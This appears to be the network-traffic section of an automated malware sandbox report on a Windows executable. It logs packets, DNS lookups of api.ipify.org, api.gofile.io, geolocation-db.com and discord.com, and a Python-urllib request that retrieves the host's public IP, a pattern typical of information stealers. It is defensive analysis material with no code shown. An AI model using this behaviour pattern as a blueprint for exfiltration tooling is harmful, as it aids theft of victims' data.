Sep 27, 2024 18:19:17.614290953 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.614367008 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.614751101 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.614759922 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.082324982 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.082757950 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.082776070 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.083950043 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.084011078 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.085469961 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.085537910 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.085628986 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.085634947 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.085658073 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.127211094 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.127224922 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.293294907 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.293457985 CEST	443	49781	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.293518066 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.295073986 CEST	49781	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.296082973 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.296113968 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.296183109 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.296591043 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.296601057 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.769762993 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.770210981 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.770229101 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.771265030 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.771336079 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.772500992 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.772559881 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.772660017 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.772666931 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.772694111 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.814718008 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.814737082 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.987432003 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.987579107 CEST	443	49782	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.987618923 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.988162994 CEST	49782	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.989084005 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.989118099 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:18.989187002 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.989511013 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:18.989520073 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.462883949 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.463284969 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.463298082 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.464375019 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.464436054 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.465898037 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.465985060 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.466015100 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.466048956 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.466057062 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.517818928 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.683746099 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.683912039 CEST	443	49783	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.684062004 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.684478045 CEST	49783	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.685481071 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.685534000 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:19.685604095 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.685956001 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:19.685977936 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.151156902 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.151719093 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.151753902 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.153038979 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.153112888 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.154524088 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.154628038 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.154663086 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.154747009 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.154753923 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.205419064 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.339394093 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.339560986 CEST	443	49784	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:20.339622974 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.340105057 CEST	49784	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:20.554852962 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:20.554913044 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:20.554991007 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:20.555402994 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:20.555416107 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.030831099 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.031327963 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.031357050 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.034953117 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.035043001 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.036195993 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.036319971 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.036722898 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.084923983 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.084940910 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.131886959 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.218425989 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.218554974 CEST	443	49785	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:21.219152927 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.219255924 CEST	49785	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:21.220334053 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:21.220364094 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:21.220451117 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:21.220823050 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:21.220834970 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.066060066 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.066643953 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.066677094 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.068289042 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.068361998 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.069608927 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.069717884 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.069725990 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.115392923 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.116142035 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.116152048 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.163253069 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.261260033 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.261384964 CEST	443	49786	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:22.261431932 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.261862993 CEST	49786	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:22.262937069 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.262998104 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.263070107 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.263417959 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.263430119 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.727447987 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.728015900 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.728099108 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.731338978 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.731453896 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.732645988 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.732743979 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.732770920 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.732800961 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.732812881 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.788031101 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.935147047 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.935312986 CEST	443	49787	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.935362101 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.935872078 CEST	49787	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.937000990 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.937036991 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:22.937119961 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.937529087 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:22.937540054 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.407759905 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.408186913 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.408221006 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.409859896 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.409919977 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.411127090 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.411221981 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.411236048 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.411273956 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.411281109 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.459937096 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.601577044 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.601771116 CEST	443	49788	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.601838112 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.607074022 CEST	49788	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.611443996 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.611499071 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:23.611596107 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.615334988 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:23.615346909 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.088996887 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.089410067 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.089437008 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.090899944 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.090961933 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.092216015 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.092305899 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.092367887 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.092377901 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.092398882 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.135402918 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.135848999 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.283596992 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.284003019 CEST	443	49789	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.284076929 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.284480095 CEST	49789	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.285629034 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.285661936 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.285753012 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.286127090 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.286142111 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.762697935 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.763324976 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.763355970 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.764435053 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.764503956 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.765705109 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.765772104 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.765804052 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.765880108 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.765889883 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.819412947 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.950994968 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.951380014 CEST	443	49790	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.951479912 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.951875925 CEST	49790	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.953071117 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.953170061 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:24.953277111 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.953623056 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:24.953659058 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.429636002 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.430114985 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.430134058 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.431189060 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.431262016 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.432429075 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.432483912 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.432553053 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.432637930 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.432643890 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.475543976 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.627696037 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.627957106 CEST	443	49791	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.628024101 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.628603935 CEST	49791	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.629754066 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.629811049 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:25.629899025 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.630291939 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:25.630309105 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.100142956 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.100963116 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.100996017 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.102418900 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.102489948 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.103632927 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.103722095 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.103744030 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.103827000 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.103832960 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.149564981 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.294634104 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.294781923 CEST	443	49792	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.294837952 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.309916973 CEST	49792	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.310884953 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.310928106 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.310997009 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.311297894 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.311316013 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.781514883 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.782018900 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.782038927 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.783106089 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.783169985 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.784346104 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.784414053 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.784504890 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.784512043 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.784538984 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.831396103 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.834914923 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.959709883 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.959857941 CEST	443	49793	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.959918022 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.960550070 CEST	49793	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.961669922 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.961695910 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:26.961780071 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.962167978 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:26.962176085 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.428033113 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.428960085 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.428977966 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.430104017 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.430324078 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.431737900 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.431838036 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.431878090 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.431962013 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.431972980 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.475585938 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.625909090 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.626055956 CEST	443	49794	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:27.626116037 CEST	49794	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:27.626718044 CEST	49794	443	192.168.2.8	162.159.136.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 18:18:43.982969999 CEST	63796	53	192.168.2.8	1.1.1.1
Sep 27, 2024 18:18:43.989835024 CEST	53	63796	1.1.1.1	192.168.2.8
Sep 27, 2024 18:18:44.024101019 CEST	52570	53	192.168.2.8	1.1.1.1
Sep 27, 2024 18:18:44.032499075 CEST	53	52570	1.1.1.1	192.168.2.8
Sep 27, 2024 18:18:44.679270029 CEST	64922	53	192.168.2.8	1.1.1.1
Sep 27, 2024 18:18:44.694757938 CEST	53	64922	1.1.1.1	192.168.2.8
Sep 27, 2024 18:18:46.023154974 CEST	64796	53	192.168.2.8	1.1.1.1
Sep 27, 2024 18:18:46.030283928 CEST	53	64796	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 18:18:43.982969999 CEST	192.168.2.8	1.1.1.1	0xc350	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:44.024101019 CEST	192.168.2.8	1.1.1.1	0xdfc3	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:44.679270029 CEST	192.168.2.8	1.1.1.1	0xbd2	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.023154974 CEST	192.168.2.8	1.1.1.1	0xce2e	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 18:18:43.989835024 CEST	1.1.1.1	192.168.2.8	0xc350	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:43.989835024 CEST	1.1.1.1	192.168.2.8	0xc350	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:43.989835024 CEST	1.1.1.1	192.168.2.8	0xc350	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:44.032499075 CEST	1.1.1.1	192.168.2.8	0xdfc3	No error (0)	api.gofile.io	45.112.123.126	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:44.694757938 CEST	1.1.1.1	192.168.2.8	0xbd2	No error (0)	geolocation-db.com	159.89.102.253	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.030283928 CEST	1.1.1.1	192.168.2.8	0xce2e	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.030283928 CEST	1.1.1.1	192.168.2.8	0xce2e	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.030283928 CEST	1.1.1.1	192.168.2.8	0xce2e	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.030283928 CEST	1.1.1.1	192.168.2.8	0xce2e	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 27, 2024 18:18:46.030283928 CEST	1.1.1.1	192.168.2.8	0xce2e	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

geolocation-db.com

discord.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	172.67.74.152	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:44 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:44 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:18:44 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9ccfb4d8744386-EWR
2024-09-27 16:18:44 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	159.89.102.253	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

